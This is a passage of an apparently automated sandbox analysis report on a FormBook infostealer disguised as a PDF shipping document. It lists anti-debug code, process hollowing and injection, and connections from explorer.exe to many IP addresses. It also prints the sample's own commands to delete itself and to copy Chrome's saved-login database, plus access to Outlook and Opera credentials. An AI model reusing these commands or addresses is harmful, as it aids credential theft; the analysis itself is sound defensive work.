      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAB70 mov eax, dword ptr fs:[00000030h]13_2_1F1DAB70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAB70 mov eax, dword ptr fs:[00000030h]13_2_1F1DAB70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D6B70 mov eax, dword ptr fs:[00000030h]13_2_1F1D6B70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D6B70 mov eax, dword ptr fs:[00000030h]13_2_1F1D6B70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D6B70 mov eax, dword ptr fs:[00000030h]13_2_1F1D6B70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BB5B mov esi, dword ptr fs:[00000030h]13_2_1F20BB5B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F298BBE mov eax, dword ptr fs:[00000030h]13_2_1F298BBE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F298BBE mov eax, dword ptr fs:[00000030h]13_2_1F298BBE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F298BBE mov eax, dword ptr fs:[00000030h]13_2_1F298BBE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F298BBE mov eax, dword ptr fs:[00000030h]13_2_1F298BBE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1B80 mov eax, dword ptr fs:[00000030h]13_2_1F1E1B80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25DB90 mov eax, dword ptr fs:[00000030h]13_2_1F25DB90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251B93 mov eax, dword ptr fs:[00000030h]13_2_1F251B93
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3BA4 mov eax, dword ptr fs:[00000030h]13_2_1F1D3BA4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3BA4 mov eax, dword ptr fs:[00000030h]13_2_1F1D3BA4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3BA4 mov eax, dword ptr fs:[00000030h]13_2_1F1D3BA4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3BA4 mov eax, dword ptr fs:[00000030h]13_2_1F1D3BA4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F201B9C mov eax, dword ptr fs:[00000030h]13_2_1F201B9C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F205BE0 mov eax, dword ptr fs:[00000030h]13_2_1F205BE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F205BE0 mov eax, dword ptr fs:[00000030h]13_2_1F205BE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4BE0 mov eax, dword ptr fs:[00000030h]13_2_1F2A4BE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F8BD1 mov eax, dword ptr fs:[00000030h]13_2_1F1F8BD1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F8BD1 mov eax, dword ptr fs:[00000030h]13_2_1F1F8BD1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CEBC0 mov eax, dword ptr fs:[00000030h]13_2_1F1CEBC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FFBC0 mov ecx, dword ptr fs:[00000030h]13_2_1F1FFBC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FFBC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FFBC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FFBC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FFBC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FFBC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FFBC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FFBC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FFBC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BBC0 mov eax, dword ptr fs:[00000030h]13_2_1F20BBC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BBC0 mov eax, dword ptr fs:[00000030h]13_2_1F20BBC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BBC0 mov ecx, dword ptr fs:[00000030h]13_2_1F20BBC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BBC0 mov eax, dword ptr fs:[00000030h]13_2_1F20BBC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F254BC0 mov eax, dword ptr fs:[00000030h]13_2_1F254BC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F254BC0 mov eax, dword ptr fs:[00000030h]13_2_1F254BC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F254BC0 mov eax, dword ptr fs:[00000030h]13_2_1F254BC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F254BC0 mov eax, dword ptr fs:[00000030h]13_2_1F254BC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FBC2 mov eax, dword ptr fs:[00000030h]13_2_1F24FBC2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7BF0 mov eax, dword ptr fs:[00000030h]13_2_1F1C7BF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7BF0 mov ecx, dword ptr fs:[00000030h]13_2_1F1C7BF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7BF0 mov eax, dword ptr fs:[00000030h]13_2_1F1C7BF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7BF0 mov eax, dword ptr fs:[00000030h]13_2_1F1C7BF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1BE7 mov eax, dword ptr fs:[00000030h]13_2_1F1E1BE7
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1BE7 mov eax, dword ptr fs:[00000030h]13_2_1F1E1BE7
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F276BDE mov ebx, dword ptr fs:[00000030h]13_2_1F276BDE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F276BDE mov eax, dword ptr fs:[00000030h]13_2_1F276BDE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25DA31 mov eax, dword ptr fs:[00000030h]13_2_1F25DA31
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28DA30 mov eax, dword ptr fs:[00000030h]13_2_1F28DA30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7A30 mov eax, dword ptr fs:[00000030h]13_2_1F1C7A30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7A30 mov eax, dword ptr fs:[00000030h]13_2_1F1C7A30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7A30 mov eax, dword ptr fs:[00000030h]13_2_1F1C7A30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20AA0E mov eax, dword ptr fs:[00000030h]13_2_1F20AA0E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20AA0E mov eax, dword ptr fs:[00000030h]13_2_1F20AA0E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D1A24 mov eax, dword ptr fs:[00000030h]13_2_1F1D1A24
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D1A24 mov eax, dword ptr fs:[00000030h]13_2_1F1D1A24
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDA20 mov eax, dword ptr fs:[00000030h]13_2_1F1FDA20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDA20 mov eax, dword ptr fs:[00000030h]13_2_1F1FDA20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDA20 mov eax, dword ptr fs:[00000030h]13_2_1F1FDA20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDA20 mov eax, dword ptr fs:[00000030h]13_2_1F1FDA20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDA20 mov eax, dword ptr fs:[00000030h]13_2_1F1FDA20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDA20 mov edx, dword ptr fs:[00000030h]13_2_1F1FDA20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29BA66 mov eax, dword ptr fs:[00000030h]13_2_1F29BA66
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29BA66 mov eax, dword ptr fs:[00000030h]13_2_1F29BA66
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29BA66 mov eax, dword ptr fs:[00000030h]13_2_1F29BA66
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29BA66 mov eax, dword ptr fs:[00000030h]13_2_1F29BA66
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CFA44 mov ecx, dword ptr fs:[00000030h]13_2_1F1CFA44
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FEA40 mov eax, dword ptr fs:[00000030h]13_2_1F1FEA40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FEA40 mov eax, dword ptr fs:[00000030h]13_2_1F1FEA40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25DA40 mov eax, dword ptr fs:[00000030h]13_2_1F25DA40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F26AA40 mov eax, dword ptr fs:[00000030h]13_2_1F26AA40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F26AA40 mov eax, dword ptr fs:[00000030h]13_2_1F26AA40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F209A48 mov eax, dword ptr fs:[00000030h]13_2_1F209A48
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F209A48 mov eax, dword ptr fs:[00000030h]13_2_1F209A48
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F254A57 mov eax, dword ptr fs:[00000030h]13_2_1F254A57
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F254A57 mov eax, dword ptr fs:[00000030h]13_2_1F254A57
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28DAAF mov eax, dword ptr fs:[00000030h]13_2_1F28DAAF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F277ABE mov eax, dword ptr fs:[00000030h]13_2_1F277ABE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CBA80 mov eax, dword ptr fs:[00000030h]13_2_1F1CBA80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F209ABF mov eax, dword ptr fs:[00000030h]13_2_1F209ABF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F209ABF mov eax, dword ptr fs:[00000030h]13_2_1F209ABF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F209ABF mov eax, dword ptr fs:[00000030h]13_2_1F209ABF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F286A80 mov eax, dword ptr fs:[00000030h]13_2_1F286A80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4AE8 mov eax, dword ptr fs:[00000030h]13_2_1F2A4AE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0ACE mov eax, dword ptr fs:[00000030h]13_2_1F1E0ACE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0ACE mov eax, dword ptr fs:[00000030h]13_2_1F1E0ACE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F250AFF mov eax, dword ptr fs:[00000030h]13_2_1F250AFF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F250AFF mov eax, dword ptr fs:[00000030h]13_2_1F250AFF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F250AFF mov eax, dword ptr fs:[00000030h]13_2_1F250AFF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDAC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FDAC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDAC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FDAC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDAC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FDAC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDAC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FDAC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDAC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FDAC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDAC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FDAC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3AF6 mov eax, dword ptr fs:[00000030h]13_2_1F1E3AF6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3AF6 mov eax, dword ptr fs:[00000030h]13_2_1F1E3AF6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3AF6 mov eax, dword ptr fs:[00000030h]13_2_1F1E3AF6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3AF6 mov eax, dword ptr fs:[00000030h]13_2_1F1E3AF6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3AF6 mov eax, dword ptr fs:[00000030h]13_2_1F1E3AF6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CFAEC mov edi, dword ptr fs:[00000030h]13_2_1F1CFAEC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D0AED mov eax, dword ptr fs:[00000030h]13_2_1F1D0AED
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D0AED mov eax, dword ptr fs:[00000030h]13_2_1F1D0AED
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D0AED mov eax, dword ptr fs:[00000030h]13_2_1F1D0AED
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F0AEB mov eax, dword ptr fs:[00000030h]13_2_1F1F0AEB
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_024506CE rdtsc 0_2_024506CE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245BF4C LdrInitializeThunk,0_2_0245BF4C

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 154.23.172.38 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 35.214.4.70 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 35.244.144.199 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 79.110.48.188 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 64.32.22.102 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 91.184.31.217 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.98 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.195.115.71 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.214.67.115 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.29.154.157 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 38.143.0.82 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.190.39.52 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 148.251.15.228 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 213.190.6.63 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 54.154.44.39 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 142.250.186.51 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 162.0.209.21 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 95.179.246.125 80Jump to behavior
      Benign windows process drops PE files
      Source: C:\Windows\explorer.exeFile created: shmhprg0nvltzt.exe.16.drJump to dropped file
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
      Injects a PE file into a foreign processes
      Source: C:\Windows\SysWOW64\chkdsk.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF66E4A0000 value starts with: 4D5A
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 970000Jump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\chkdsk.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF66E4A0000
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeThread register set: target process: 4908Jump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeThread register set: target process: 4908Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 4908
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess created: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeProcess created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
      Source: explorer.exe, 00000010.00000000.2444951633.00000000016E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2495510698.00000000016E1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2690597696.00000000055E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000010.00000000.2444951633.00000000016E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2495510698.00000000016E1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2681931974.00000000016E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000010.00000000.2493399478.0000000000E59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2442798795.0000000000E59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2550675454.0000000000E59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman'
      Source: explorer.exe, 00000010.00000000.2444951633.00000000016E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2495510698.00000000016E1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2681931974.00000000016E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000010.00000000.2444951633.00000000016E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2495510698.00000000016E1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2681931974.00000000016E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: jProgram Manager
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
      Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
